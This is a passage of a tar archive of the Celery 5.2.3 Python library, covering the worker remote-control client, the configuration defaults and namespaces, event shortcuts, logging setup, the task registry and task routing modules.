""" return self._request('conf', with_defaults=with_defaults) def hello(self, from_node, revoked=None): return self._request('hello', from_node=from_node, revoked=revoked) def memsample(self): """Return sample current RSS memory usage. Note: Requires the psutils library. """ return self._request('memsample') def memdump(self, samples=10): """Dump statistics of previous memsample requests. Note: Requires the psutils library. """ return self._request('memdump', samples=samples) def objgraph(self, type='Request', n=200, max_depth=10): """Create graph of uncollected objects (memory-leak debugging). Arguments: n (int): Max number of objects to graph. max_depth (int): Traverse at most n levels deep. type (str): Name of object to graph. Default is ``"Request"``. Returns: Dict: Dictionary ``{'filename': FILENAME}`` Note: Requires the objgraph library. """ return self._request('objgraph', num=n, max_depth=max_depth, type=type) class Control: """Worker remote control client.""" Mailbox = Mailbox def __init__(self, app=None): self.app = app self.mailbox = self.Mailbox( app.conf.control_exchange, type='fanout', accept=app.conf.accept_content, serializer=app.conf.task_serializer, producer_pool=lazy(lambda: self.app.amqp.producer_pool), queue_ttl=app.conf.control_queue_ttl, reply_queue_ttl=app.conf.control_queue_ttl, queue_expires=app.conf.control_queue_expires, reply_queue_expires=app.conf.control_queue_expires, ) register_after_fork(self, _after_fork_cleanup_control) def _after_fork(self): del self.mailbox.producer_pool @cached_property def inspect(self): """Create new :class:`Inspect` instance.""" return self.app.subclass_with_self(Inspect, reverse='control.inspect') def purge(self, connection=None): """Discard all waiting tasks. This will ignore all tasks waiting for execution, and they will be deleted from the messaging server. Arguments: connection (kombu.Connection): Optional specific connection instance to use. If not provided a connection will be acquired from the connection pool. Returns: int: the number of tasks discarded. """ with self.app.connection_or_acquire(connection) as conn: return self.app.amqp.TaskConsumer(conn).purge() discard_all = purge def election(self, id, topic, action=None, connection=None): self.broadcast( 'election', connection=connection, destination=None, arguments={ 'id': id, 'topic': topic, 'action': action, }, ) def revoke(self, task_id, destination=None, terminate=False, signal=TERM_SIGNAME, **kwargs): """Tell all (or specific) workers to revoke a task by id (or list of ids). If a task is revoked, the workers will ignore the task and not execute it after all. Arguments: task_id (Union(str, list)): Id of the task to revoke (or list of ids). terminate (bool): Also terminate the process currently working on the task (if any). signal (str): Name of signal to send to process if terminate. Default is TERM. See Also: :meth:`broadcast` for supported keyword arguments. """ return self.broadcast('revoke', destination=destination, arguments={ 'task_id': task_id, 'terminate': terminate, 'signal': signal, }, **kwargs) def terminate(self, task_id, destination=None, signal=TERM_SIGNAME, **kwargs): """Tell all (or specific) workers to terminate a task by id (or list of ids). See Also: This is just a shortcut to :meth:`revoke` with the terminate argument enabled. """ return self.revoke( task_id, destination=destination, terminate=True, signal=signal, **kwargs) def ping(self, destination=None, timeout=1.0, **kwargs): """Ping all (or specific) workers. 
>>> app.control.ping() [{'celery@node1': {'ok': 'pong'}}, {'celery@node2': {'ok': 'pong'}}] >>> app.control.ping(destination=['celery@node2']) [{'celery@node2': {'ok': 'pong'}}] Returns: List[Dict]: List of ``{HOSTNAME: {'ok': 'pong'}}`` dictionaries. See Also: :meth:`broadcast` for supported keyword arguments. """ return self.broadcast( 'ping', reply=True, arguments={}, destination=destination, timeout=timeout, **kwargs) def rate_limit(self, task_name, rate_limit, destination=None, **kwargs): """Tell workers to set a new rate limit for task by type. Arguments: task_name (str): Name of task to change rate limit for. rate_limit (int, str): The rate limit as tasks per second, or a rate limit string (`'100/m'`, etc. see :attr:`celery.app.task.Task.rate_limit` for more information). See Also: :meth:`broadcast` for supported keyword arguments. """ return self.broadcast( 'rate_limit', destination=destination, arguments={ 'task_name': task_name, 'rate_limit': rate_limit, }, **kwargs) def add_consumer(self, queue, exchange=None, exchange_type='direct', routing_key=None, options=None, destination=None, **kwargs): """Tell all (or specific) workers to start consuming from a new queue. Only the queue name is required as if only the queue is specified then the exchange/routing key will be set to the same name ( like automatic queues do). Note: This command does not respect the default queue/exchange options in the configuration. Arguments: queue (str): Name of queue to start consuming from. exchange (str): Optional name of exchange. exchange_type (str): Type of exchange (defaults to 'direct') command to, when empty broadcast to all workers. routing_key (str): Optional routing key. options (Dict): Additional options as supported by :meth:`kombu.entity.Queue.from_dict`. See Also: :meth:`broadcast` for supported keyword arguments. """ return self.broadcast( 'add_consumer', destination=destination, arguments=dict({ 'queue': queue, 'exchange': exchange, 'exchange_type': exchange_type, 'routing_key': routing_key, }, **options or {}), **kwargs ) def cancel_consumer(self, queue, destination=None, **kwargs): """Tell all (or specific) workers to stop consuming from ``queue``. See Also: Supports the same arguments as :meth:`broadcast`. """ return self.broadcast( 'cancel_consumer', destination=destination, arguments={'queue': queue}, **kwargs) def time_limit(self, task_name, soft=None, hard=None, destination=None, **kwargs): """Tell workers to set time limits for a task by type. Arguments: task_name (str): Name of task to change time limits for. soft (float): New soft time limit (in seconds). hard (float): New hard time limit (in seconds). **kwargs (Any): arguments passed on to :meth:`broadcast`. """ return self.broadcast( 'time_limit', arguments={ 'task_name': task_name, 'hard': hard, 'soft': soft, }, destination=destination, **kwargs) def enable_events(self, destination=None, **kwargs): """Tell all (or specific) workers to enable events. See Also: Supports the same arguments as :meth:`broadcast`. """ return self.broadcast( 'enable_events', arguments={}, destination=destination, **kwargs) def disable_events(self, destination=None, **kwargs): """Tell all (or specific) workers to disable events. See Also: Supports the same arguments as :meth:`broadcast`. """ return self.broadcast( 'disable_events', arguments={}, destination=destination, **kwargs) def pool_grow(self, n=1, destination=None, **kwargs): """Tell all (or specific) workers to grow the pool by ``n``. 
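For example (hypothetical node name; a running worker is assumed, and since no reply is requested nothing is returned)::

    >>> app.control.pool_grow(2, destination=['celery@node1'])
    >>> app.control.pool_shrink(2, destination=['celery@node1'])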
See Also: Supports the same arguments as :meth:`broadcast`. """ return self.broadcast( 'pool_grow', arguments={'n': n}, destination=destination, **kwargs) def pool_shrink(self, n=1, destination=None, **kwargs): """Tell all (or specific) workers to shrink the pool by ``n``. See Also: Supports the same arguments as :meth:`broadcast`. """ return self.broadcast( 'pool_shrink', arguments={'n': n}, destination=destination, **kwargs) def autoscale(self, max, min, destination=None, **kwargs): """Change worker(s) autoscale setting. See Also: Supports the same arguments as :meth:`broadcast`. """ return self.broadcast( 'autoscale', arguments={'max': max, 'min': min}, destination=destination, **kwargs) def shutdown(self, destination=None, **kwargs): """Shutdown worker(s). See Also: Supports the same arguments as :meth:`broadcast` """ return self.broadcast( 'shutdown', arguments={}, destination=destination, **kwargs) def pool_restart(self, modules=None, reload=False, reloader=None, destination=None, **kwargs): """Restart the execution pools of all or specific workers. Keyword Arguments: modules (Sequence[str]): List of modules to reload. reload (bool): Flag to enable module reloading. Default is False. reloader (Any): Function to reload a module. destination (Sequence[str]): List of worker names to send this command to. See Also: Supports the same arguments as :meth:`broadcast` """ return self.broadcast( 'pool_restart', arguments={ 'modules': modules, 'reload': reload, 'reloader': reloader, }, destination=destination, **kwargs) def heartbeat(self, destination=None, **kwargs): """Tell worker(s) to send a heartbeat immediately. See Also: Supports the same arguments as :meth:`broadcast` """ return self.broadcast( 'heartbeat', arguments={}, destination=destination, **kwargs) def broadcast(self, command, arguments=None, destination=None, connection=None, reply=False, timeout=1.0, limit=None, callback=None, channel=None, pattern=None, matcher=None, **extra_kwargs): """Broadcast a control command to the celery workers. Arguments: command (str): Name of command to send. arguments (Dict): Keyword arguments for the command. destination (List): If set, a list of the hosts to send the command to, when empty broadcast to all workers. connection (kombu.Connection): Custom broker connection to use, if not set, a connection will be acquired from the pool. reply (bool): Wait for and return the reply. timeout (float): Timeout in seconds to wait for the reply. limit (int): Limit number of replies. callback (Callable): Callback called immediately for each reply received. 
pattern (str): Custom pattern string to match matcher (Callable): Custom matcher to run the pattern to match """ with self.app.connection_or_acquire(connection) as conn: arguments = dict(arguments or {}, **extra_kwargs) if pattern and matcher: # tests pass easier without requiring pattern/matcher to # always be sent in return self.mailbox(conn)._broadcast( command, arguments, destination, reply, timeout, limit, callback, channel=channel, pattern=pattern, matcher=matcher, ) else: return self.mailbox(conn)._broadcast( command, arguments, destination, reply, timeout, limit, callback, channel=channel, ) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/defaults.py0000664000175000017500000003453700000000000017135 0ustar00asifasif00000000000000"""Configuration introspection and defaults.""" from collections import deque, namedtuple from datetime import timedelta from celery.utils.functional import memoize from celery.utils.serialization import strtobool __all__ = ('Option', 'NAMESPACES', 'flatten', 'find') DEFAULT_POOL = 'prefork' DEFAULT_ACCEPT_CONTENT = ['json'] DEFAULT_PROCESS_LOG_FMT = """ [%(asctime)s: %(levelname)s/%(processName)s] %(message)s """.strip() DEFAULT_TASK_LOG_FMT = """[%(asctime)s: %(levelname)s/%(processName)s] \ %(task_name)s[%(task_id)s]: %(message)s""" DEFAULT_SECURITY_DIGEST = 'sha256' OLD_NS = {'celery_{0}'} OLD_NS_BEAT = {'celerybeat_{0}'} OLD_NS_WORKER = {'celeryd_{0}'} searchresult = namedtuple('searchresult', ('namespace', 'key', 'type')) def Namespace(__old__=None, **options): if __old__ is not None: for key, opt in options.items(): if not opt.old: opt.old = {o.format(key) for o in __old__} return options def old_ns(ns): return {f'{ns}_{{0}}'} class Option: """Describes a Celery configuration option.""" alt = None deprecate_by = None remove_by = None old = set() typemap = {'string': str, 'int': int, 'float': float, 'any': lambda v: v, 'bool': strtobool, 'dict': dict, 'tuple': tuple} def __init__(self, default=None, *args, **kwargs): self.default = default self.type = kwargs.get('type') or 'string' for attr, value in kwargs.items(): setattr(self, attr, value) def to_python(self, value): return self.typemap[self.type](value) def __repr__(self): return '{} default->{!r}>'.format(self.type, self.default) NAMESPACES = Namespace( accept_content=Option(DEFAULT_ACCEPT_CONTENT, type='list', old=OLD_NS), result_accept_content=Option(None, type='list'), enable_utc=Option(True, type='bool'), imports=Option((), type='tuple', old=OLD_NS), include=Option((), type='tuple', old=OLD_NS), timezone=Option(type='string', old=OLD_NS), beat=Namespace( __old__=OLD_NS_BEAT, max_loop_interval=Option(0, type='float'), schedule=Option({}, type='dict'), scheduler=Option('celery.beat:PersistentScheduler'), schedule_filename=Option('celerybeat-schedule'), sync_every=Option(0, type='int'), ), broker=Namespace( url=Option(None, type='string'), read_url=Option(None, type='string'), write_url=Option(None, type='string'), transport=Option(type='string'), transport_options=Option({}, type='dict'), connection_timeout=Option(4, type='float'), connection_retry=Option(True, type='bool'), connection_max_retries=Option(100, type='int'), failover_strategy=Option(None, type='string'), heartbeat=Option(120, type='int'), heartbeat_checkrate=Option(3.0, type='int'), login_method=Option(None, type='string'), pool_limit=Option(10, type='int'), use_ssl=Option(False, type='bool'), host=Option(type='string'), port=Option(type='int'), 
user=Option(type='string'), password=Option(type='string'), vhost=Option(type='string'), ), cache=Namespace( __old__=old_ns('celery_cache'), backend=Option(), backend_options=Option({}, type='dict'), ), cassandra=Namespace( entry_ttl=Option(type='float'), keyspace=Option(type='string'), port=Option(type='string'), read_consistency=Option(type='string'), servers=Option(type='list'), table=Option(type='string'), write_consistency=Option(type='string'), auth_provider=Option(type='string'), auth_kwargs=Option(type='string'), options=Option({}, type='dict'), ), s3=Namespace( access_key_id=Option(type='string'), secret_access_key=Option(type='string'), bucket=Option(type='string'), base_path=Option(type='string'), endpoint_url=Option(type='string'), region=Option(type='string'), ), azureblockblob=Namespace( container_name=Option('celery', type='string'), retry_initial_backoff_sec=Option(2, type='int'), retry_increment_base=Option(2, type='int'), retry_max_attempts=Option(3, type='int'), base_path=Option('', type='string'), connection_timeout=Option(20, type='int'), read_timeout=Option(120, type='int'), ), control=Namespace( queue_ttl=Option(300.0, type='float'), queue_expires=Option(10.0, type='float'), exchange=Option('celery', type='string'), ), couchbase=Namespace( __old__=old_ns('celery_couchbase'), backend_settings=Option(None, type='dict'), ), arangodb=Namespace( __old__=old_ns('celery_arangodb'), backend_settings=Option(None, type='dict') ), mongodb=Namespace( __old__=old_ns('celery_mongodb'), backend_settings=Option(type='dict'), ), cosmosdbsql=Namespace( database_name=Option('celerydb', type='string'), collection_name=Option('celerycol', type='string'), consistency_level=Option('Session', type='string'), max_retry_attempts=Option(9, type='int'), max_retry_wait_time=Option(30, type='int'), ), event=Namespace( __old__=old_ns('celery_event'), queue_expires=Option(60.0, type='float'), queue_ttl=Option(5.0, type='float'), queue_prefix=Option('celeryev'), serializer=Option('json'), exchange=Option('celeryev', type='string'), ), redis=Namespace( __old__=old_ns('celery_redis'), backend_use_ssl=Option(type='dict'), db=Option(type='int'), host=Option(type='string'), max_connections=Option(type='int'), username=Option(type='string'), password=Option(type='string'), port=Option(type='int'), socket_timeout=Option(120.0, type='float'), socket_connect_timeout=Option(None, type='float'), retry_on_timeout=Option(False, type='bool'), socket_keepalive=Option(False, type='bool'), ), result=Namespace( __old__=old_ns('celery_result'), backend=Option(type='string'), cache_max=Option( -1, type='int', old={'celery_max_cached_results'}, ), compression=Option(type='str'), exchange=Option('celeryresults'), exchange_type=Option('direct'), expires=Option( timedelta(days=1), type='float', old={'celery_task_result_expires'}, ), persistent=Option(None, type='bool'), extended=Option(False, type='bool'), serializer=Option('json'), backend_transport_options=Option({}, type='dict'), chord_retry_interval=Option(1.0, type='float'), chord_join_timeout=Option(3.0, type='float'), backend_max_sleep_between_retries_ms=Option(10000, type='int'), backend_max_retries=Option(float("inf"), type='float'), backend_base_sleep_between_retries_ms=Option(10, type='int'), backend_always_retry=Option(False, type='bool'), ), elasticsearch=Namespace( __old__=old_ns('celery_elasticsearch'), retry_on_timeout=Option(type='bool'), max_retries=Option(type='int'), timeout=Option(type='float'), save_meta_as_text=Option(True, type='bool'), ), 
security=Namespace( __old__=old_ns('celery_security'), certificate=Option(type='string'), cert_store=Option(type='string'), key=Option(type='string'), digest=Option(DEFAULT_SECURITY_DIGEST, type='string'), ), database=Namespace( url=Option(old={'celery_result_dburi'}), engine_options=Option( type='dict', old={'celery_result_engine_options'}, ), short_lived_sessions=Option( False, type='bool', old={'celery_result_db_short_lived_sessions'}, ), table_schemas=Option(type='dict'), table_names=Option(type='dict', old={'celery_result_db_tablenames'}), ), task=Namespace( __old__=OLD_NS, acks_late=Option(False, type='bool'), acks_on_failure_or_timeout=Option(True, type='bool'), always_eager=Option(False, type='bool'), annotations=Option(type='any'), compression=Option(type='string', old={'celery_message_compression'}), create_missing_queues=Option(True, type='bool'), inherit_parent_priority=Option(False, type='bool'), default_delivery_mode=Option(2, type='string'), default_queue=Option('celery'), default_exchange=Option(None, type='string'), # taken from queue default_exchange_type=Option('direct'), default_routing_key=Option(None, type='string'), # taken from queue default_rate_limit=Option(type='string'), default_priority=Option(None, type='string'), eager_propagates=Option( False, type='bool', old={'celery_eager_propagates_exceptions'}, ), ignore_result=Option(False, type='bool'), store_eager_result=Option(False, type='bool'), protocol=Option(2, type='int', old={'celery_task_protocol'}), publish_retry=Option( True, type='bool', old={'celery_task_publish_retry'}, ), publish_retry_policy=Option( {'max_retries': 3, 'interval_start': 0, 'interval_max': 1, 'interval_step': 0.2}, type='dict', old={'celery_task_publish_retry_policy'}, ), queues=Option(type='dict'), queue_max_priority=Option(None, type='int'), reject_on_worker_lost=Option(type='bool'), remote_tracebacks=Option(False, type='bool'), routes=Option(type='any'), send_sent_event=Option( False, type='bool', old={'celery_send_task_sent_event'}, ), serializer=Option('json', old={'celery_task_serializer'}), soft_time_limit=Option( type='float', old={'celeryd_task_soft_time_limit'}, ), time_limit=Option( type='float', old={'celeryd_task_time_limit'}, ), store_errors_even_if_ignored=Option(False, type='bool'), track_started=Option(False, type='bool'), ), worker=Namespace( __old__=OLD_NS_WORKER, agent=Option(None, type='string'), autoscaler=Option('celery.worker.autoscale:Autoscaler'), cancel_long_running_tasks_on_connection_loss=Option( False, type='bool' ), concurrency=Option(None, type='int'), consumer=Option('celery.worker.consumer:Consumer', type='string'), direct=Option(False, type='bool', old={'celery_worker_direct'}), disable_rate_limits=Option( False, type='bool', old={'celery_disable_rate_limits'}, ), deduplicate_successful_tasks=Option( False, type='bool' ), enable_remote_control=Option( True, type='bool', old={'celery_enable_remote_control'}, ), hijack_root_logger=Option(True, type='bool'), log_color=Option(type='bool'), log_format=Option(DEFAULT_PROCESS_LOG_FMT), lost_wait=Option(10.0, type='float', old={'celeryd_worker_lost_wait'}), max_memory_per_child=Option(type='int'), max_tasks_per_child=Option(type='int'), pool=Option(DEFAULT_POOL), pool_putlocks=Option(True, type='bool'), pool_restarts=Option(False, type='bool'), proc_alive_timeout=Option(4.0, type='float'), prefetch_multiplier=Option(4, type='int'), redirect_stdouts=Option( True, type='bool', old={'celery_redirect_stdouts'}, ), redirect_stdouts_level=Option( 'WARNING', 
old={'celery_redirect_stdouts_level'}, ), send_task_events=Option( False, type='bool', old={'celery_send_events'}, ), state_db=Option(), task_log_format=Option(DEFAULT_TASK_LOG_FMT), timer=Option(type='string'), timer_precision=Option(1.0, type='float'), ), ) def _flatten_keys(ns, key, opt): return [(ns + key, opt)] def _to_compat(ns, key, opt): if opt.old: return [ (oldkey.format(key).upper(), ns + key, opt) for oldkey in opt.old ] return [((ns + key).upper(), ns + key, opt)] def flatten(d, root='', keyfilter=_flatten_keys): """Flatten settings.""" stack = deque([(root, d)]) while stack: ns, options = stack.popleft() for key, opt in options.items(): if isinstance(opt, dict): stack.append((ns + key + '_', opt)) else: yield from keyfilter(ns, key, opt) DEFAULTS = { key: opt.default for key, opt in flatten(NAMESPACES) } __compat = list(flatten(NAMESPACES, keyfilter=_to_compat)) _OLD_DEFAULTS = {old_key: opt.default for old_key, _, opt in __compat} _TO_OLD_KEY = {new_key: old_key for old_key, new_key, _ in __compat} _TO_NEW_KEY = {old_key: new_key for old_key, new_key, _ in __compat} __compat = None SETTING_KEYS = set(DEFAULTS.keys()) _OLD_SETTING_KEYS = set(_TO_NEW_KEY.keys()) def find_deprecated_settings(source): # pragma: no cover from celery.utils import deprecated for name, opt in flatten(NAMESPACES): if (opt.deprecate_by or opt.remove_by) and getattr(source, name, None): deprecated.warn(description=f'The {name!r} setting', deprecation=opt.deprecate_by, removal=opt.remove_by, alternative=f'Use the {opt.alt} instead') return source @memoize(maxsize=None) def find(name, namespace='celery'): """Find setting by name.""" # - Try specified name-space first. namespace = namespace.lower() try: return searchresult( namespace, name.lower(), NAMESPACES[namespace][name.lower()], ) except KeyError: # - Try all the other namespaces. for ns, opts in NAMESPACES.items(): if ns.lower() == name.lower(): return searchresult(None, ns, opts) elif isinstance(opts, dict): try: return searchresult(ns, name.lower(), opts[name.lower()]) except KeyError: pass # - See if name is a qualname last. return searchresult(None, name.lower(), DEFAULTS[name.lower()]) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/events.py0000664000175000017500000000245600000000000016625 0ustar00asifasif00000000000000"""Implementation for the app.events shortcuts.""" from contextlib import contextmanager from kombu.utils.objects import cached_property class Events: """Implements app.events.""" receiver_cls = 'celery.events.receiver:EventReceiver' dispatcher_cls = 'celery.events.dispatcher:EventDispatcher' state_cls = 'celery.events.state:State' def __init__(self, app=None): self.app = app @cached_property def Receiver(self): return self.app.subclass_with_self( self.receiver_cls, reverse='events.Receiver') @cached_property def Dispatcher(self): return self.app.subclass_with_self( self.dispatcher_cls, reverse='events.Dispatcher') @cached_property def State(self): return self.app.subclass_with_self( self.state_cls, reverse='events.State') @contextmanager def default_dispatcher(self, hostname=None, enabled=True, buffer_while_offline=False): with self.app.amqp.producer_pool.acquire(block=True) as prod: # pylint: disable=too-many-function-args # This is a property pylint... 
with self.Dispatcher(prod.connection, hostname, enabled, prod.channel, buffer_while_offline) as d: yield d ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/log.py0000664000175000017500000002167400000000000016105 0ustar00asifasif00000000000000"""Logging configuration. The Celery instances logging section: ``Celery.log``. Sets up logging for the worker and other programs, redirects standard outs, colors log output, patches logging related compatibility fixes, and so on. """ import logging import os import sys import warnings from logging.handlers import WatchedFileHandler from kombu.utils.encoding import set_default_encoding_file from celery import signals from celery._state import get_current_task from celery.exceptions import CDeprecationWarning, CPendingDeprecationWarning from celery.local import class_property from celery.platforms import isatty from celery.utils.log import (ColorFormatter, LoggingProxy, get_logger, get_multiprocessing_logger, mlevel, reset_multiprocessing_logger) from celery.utils.nodenames import node_format from celery.utils.term import colored __all__ = ('TaskFormatter', 'Logging') MP_LOG = os.environ.get('MP_LOG', False) class TaskFormatter(ColorFormatter): """Formatter for tasks, adding the task name and id.""" def format(self, record): task = get_current_task() if task and task.request: record.__dict__.update(task_id=task.request.id, task_name=task.name) else: record.__dict__.setdefault('task_name', '???') record.__dict__.setdefault('task_id', '???') return super().format(record) class Logging: """Application logging setup (app.log).""" #: The logging subsystem is only configured once per process. #: setup_logging_subsystem sets this flag, and subsequent calls #: will do nothing. 
_setup = False def __init__(self, app): self.app = app self.loglevel = mlevel(logging.WARN) self.format = self.app.conf.worker_log_format self.task_format = self.app.conf.worker_task_log_format self.colorize = self.app.conf.worker_log_color def setup(self, loglevel=None, logfile=None, redirect_stdouts=False, redirect_level='WARNING', colorize=None, hostname=None): loglevel = mlevel(loglevel) handled = self.setup_logging_subsystem( loglevel, logfile, colorize=colorize, hostname=hostname, ) if not handled: if redirect_stdouts: self.redirect_stdouts(redirect_level) os.environ.update( CELERY_LOG_LEVEL=str(loglevel) if loglevel else '', CELERY_LOG_FILE=str(logfile) if logfile else '', ) warnings.filterwarnings('always', category=CDeprecationWarning) warnings.filterwarnings('always', category=CPendingDeprecationWarning) logging.captureWarnings(True) return handled def redirect_stdouts(self, loglevel=None, name='celery.redirected'): self.redirect_stdouts_to_logger( get_logger(name), loglevel=loglevel ) os.environ.update( CELERY_LOG_REDIRECT='1', CELERY_LOG_REDIRECT_LEVEL=str(loglevel or ''), ) def setup_logging_subsystem(self, loglevel=None, logfile=None, format=None, colorize=None, hostname=None, **kwargs): if self.already_setup: return if logfile and hostname: logfile = node_format(logfile, hostname) Logging._setup = True loglevel = mlevel(loglevel or self.loglevel) format = format or self.format colorize = self.supports_color(colorize, logfile) reset_multiprocessing_logger() receivers = signals.setup_logging.send( sender=None, loglevel=loglevel, logfile=logfile, format=format, colorize=colorize, ) if not receivers: root = logging.getLogger() if self.app.conf.worker_hijack_root_logger: root.handlers = [] get_logger('celery').handlers = [] get_logger('celery.task').handlers = [] get_logger('celery.redirected').handlers = [] # Configure root logger self._configure_logger( root, logfile, loglevel, format, colorize, **kwargs ) # Configure the multiprocessing logger self._configure_logger( get_multiprocessing_logger(), logfile, loglevel if MP_LOG else logging.ERROR, format, colorize, **kwargs ) signals.after_setup_logger.send( sender=None, logger=root, loglevel=loglevel, logfile=logfile, format=format, colorize=colorize, ) # then setup the root task logger. self.setup_task_loggers(loglevel, logfile, colorize=colorize) try: stream = logging.getLogger().handlers[0].stream except (AttributeError, IndexError): pass else: set_default_encoding_file(stream) # This is a hack for multiprocessing's fork+exec, so that # logging before Process.run works. logfile_name = logfile if isinstance(logfile, str) else '' os.environ.update(_MP_FORK_LOGLEVEL_=str(loglevel), _MP_FORK_LOGFILE_=logfile_name, _MP_FORK_LOGFORMAT_=format) return receivers def _configure_logger(self, logger, logfile, loglevel, format, colorize, **kwargs): if logger is not None: self.setup_handlers(logger, logfile, format, colorize, **kwargs) if loglevel: logger.setLevel(loglevel) def setup_task_loggers(self, loglevel=None, logfile=None, format=None, colorize=None, propagate=False, **kwargs): """Setup the task logger. If `logfile` is not specified, then `sys.stderr` is used. Will return the base task logger object. 
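A minimal sketch (``app`` is an already-created app; with no ``logfile`` the handler writes to ``sys.stderr``)::

    >>> logger = app.log.setup_task_loggers(loglevel='INFO')
    >>> logger.name
    'celery.task'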
""" loglevel = mlevel(loglevel or self.loglevel) format = format or self.task_format colorize = self.supports_color(colorize, logfile) logger = self.setup_handlers( get_logger('celery.task'), logfile, format, colorize, formatter=TaskFormatter, **kwargs ) logger.setLevel(loglevel) # this is an int for some reason, better to not question why. logger.propagate = int(propagate) signals.after_setup_task_logger.send( sender=None, logger=logger, loglevel=loglevel, logfile=logfile, format=format, colorize=colorize, ) return logger def redirect_stdouts_to_logger(self, logger, loglevel=None, stdout=True, stderr=True): """Redirect :class:`sys.stdout` and :class:`sys.stderr` to logger. Arguments: logger (logging.Logger): Logger instance to redirect to. loglevel (int, str): The loglevel redirected message will be logged as. """ proxy = LoggingProxy(logger, loglevel) if stdout: sys.stdout = proxy if stderr: sys.stderr = proxy return proxy def supports_color(self, colorize=None, logfile=None): colorize = self.colorize if colorize is None else colorize if self.app.IS_WINDOWS: # Windows does not support ANSI color codes. return False if colorize or colorize is None: # Only use color if there's no active log file # and stderr is an actual terminal. return logfile is None and isatty(sys.stderr) return colorize def colored(self, logfile=None, enabled=None): return colored(enabled=self.supports_color(enabled, logfile)) def setup_handlers(self, logger, logfile, format, colorize, formatter=ColorFormatter, **kwargs): if self._is_configured(logger): return logger handler = self._detect_handler(logfile) handler.setFormatter(formatter(format, use_color=colorize)) logger.addHandler(handler) return logger def _detect_handler(self, logfile=None): """Create handler from filename, an open stream or `None` (stderr).""" logfile = sys.__stderr__ if logfile is None else logfile if hasattr(logfile, 'write'): return logging.StreamHandler(logfile) return WatchedFileHandler(logfile, encoding='utf-8') def _has_handler(self, logger): return any( not isinstance(h, logging.NullHandler) for h in logger.handlers or [] ) def _is_configured(self, logger): return self._has_handler(logger) and not getattr( logger, '_rudimentary_setup', False) def get_default_logger(self, name='celery', **kwargs): return get_logger(name) @class_property def already_setup(self): return self._setup @already_setup.setter def already_setup(self, was_setup): self._setup = was_setup ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/registry.py0000664000175000017500000000372100000000000017165 0ustar00asifasif00000000000000"""Registry of available tasks.""" import inspect from importlib import import_module from celery._state import get_current_app from celery.app.autoretry import add_autoretry_behaviour from celery.exceptions import InvalidTaskError, NotRegistered __all__ = ('TaskRegistry',) class TaskRegistry(dict): """Map of registered tasks.""" NotRegistered = NotRegistered def __missing__(self, key): raise self.NotRegistered(key) def register(self, task): """Register a task in the task registry. The task will be automatically instantiated if not already an instance. Name must be configured prior to registration. 
""" if task.name is None: raise InvalidTaskError( 'Task class {!r} must specify .name attribute'.format( type(task).__name__)) task = inspect.isclass(task) and task() or task add_autoretry_behaviour(task) self[task.name] = task def unregister(self, name): """Unregister task by name. Arguments: name (str): name of the task to unregister, or a :class:`celery.app.task.Task` with a valid `name` attribute. Raises: celery.exceptions.NotRegistered: if the task is not registered. """ try: self.pop(getattr(name, 'name', name)) except KeyError: raise self.NotRegistered(name) # -- these methods are irrelevant now and will be removed in 4.0 def regular(self): return self.filter_types('regular') def periodic(self): return self.filter_types('periodic') def filter_types(self, type): return {name: task for name, task in self.items() if getattr(task, 'type', 'regular') == type} def _unpickle_task(name): return get_current_app().tasks[name] def _unpickle_task_v2(name, module=None): if module: import_module(module) return get_current_app().tasks[name] ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/routes.py0000664000175000017500000001065700000000000016644 0ustar00asifasif00000000000000"""Task Routing. Contains utilities for working with task routers, (:setting:`task_routes`). """ import fnmatch import re from collections import OrderedDict from collections.abc import Mapping from kombu import Queue from celery.exceptions import QueueNotFound from celery.utils.collections import lpmerge from celery.utils.functional import maybe_evaluate, mlazy from celery.utils.imports import symbol_by_name try: Pattern = re._pattern_type except AttributeError: # pragma: no cover # for support Python 3.7 Pattern = re.Pattern __all__ = ('MapRoute', 'Router', 'prepare') class MapRoute: """Creates a router out of a :class:`dict`.""" def __init__(self, map): map = map.items() if isinstance(map, Mapping) else map self.map = {} self.patterns = OrderedDict() for k, v in map: if isinstance(k, Pattern): self.patterns[k] = v elif '*' in k: self.patterns[re.compile(fnmatch.translate(k))] = v else: self.map[k] = v def __call__(self, name, *args, **kwargs): try: return dict(self.map[name]) except KeyError: pass except ValueError: return {'queue': self.map[name]} for regex, route in self.patterns.items(): if regex.match(name): try: return dict(route) except ValueError: return {'queue': route} class Router: """Route tasks based on the :setting:`task_routes` setting.""" def __init__(self, routes=None, queues=None, create_missing=False, app=None): self.app = app self.queues = {} if queues is None else queues self.routes = [] if routes is None else routes self.create_missing = create_missing def route(self, options, name, args=(), kwargs=None, task_type=None): kwargs = {} if not kwargs else kwargs options = self.expand_destination(options) # expands 'queue' if self.routes: route = self.lookup_route(name, args, kwargs, options, task_type) if route: # expands 'queue' in route. return lpmerge(self.expand_destination(route), options) if 'queue' not in options: options = lpmerge(self.expand_destination( self.app.conf.task_default_queue), options) return options def expand_destination(self, route): # Route can be a queue name: convenient for direct exchanges. if isinstance(route, str): queue, route = route, {} else: # can use defaults from configured queue, but override specific # things (like the routing_key): great for topic exchanges. 
queue = route.pop('queue', None) if queue: if isinstance(queue, Queue): route['queue'] = queue else: try: route['queue'] = self.queues[queue] except KeyError: raise QueueNotFound( f'Queue {queue!r} missing from task_queues') return route def lookup_route(self, name, args=None, kwargs=None, options=None, task_type=None): query = self.query_router for router in self.routes: route = query(router, name, args, kwargs, options, task_type) if route is not None: return route def query_router(self, router, task, args, kwargs, options, task_type): router = maybe_evaluate(router) if hasattr(router, 'route_for_task'): # pre 4.0 router class return router.route_for_task(task, args, kwargs) return router(task, args, kwargs, options, task=task_type) def expand_router_string(router): router = symbol_by_name(router) if hasattr(router, 'route_for_task'): # need to instantiate pre 4.0 router classes router = router() return router def prepare(routes): """Expand the :setting:`task_routes` setting.""" def expand_route(route): if isinstance(route, (Mapping, list, tuple)): return MapRoute(route) if isinstance(route, str): return mlazy(expand_router_string, route) return route if routes is None: return () if not isinstance(routes, (list, tuple)): routes = (routes,) return [expand_route(route) for route in routes] ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 